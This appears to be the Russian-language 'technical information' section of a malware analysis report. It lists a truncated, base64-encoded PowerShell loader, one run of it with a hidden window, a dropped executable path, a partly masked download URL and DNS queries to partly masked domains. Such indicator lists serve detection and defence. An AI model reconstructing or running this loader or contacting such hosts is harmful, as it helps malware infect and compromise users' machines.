Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABTAHUAMQAyADEAMAA5AD0AKAAoACcARgA3ADUAJwArACcAaAAwACcAKQArACcAZAA2ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAGUAcgBQAFIATwBGAEkATABlAFwARQ...
- %HOMEPATH%\eoam8ie\cxb3qbr\s9u277.exe
- http://on####ws24x7.com/5i1r62/cEsCCqC4li/
- DNS ASK yo##el.com
- DNS ASK xi###ico.com
- DNS ASK on####ws24x7.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABTAHUAMQAyADEAMAA5AD0AKAAoACcARgA3ADUAJwArACcAaAAwACcAKQArACcAZAA2ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAGUAcgBQAFIATwBGAEkATABlAFwARQ...' (со скрытым окном)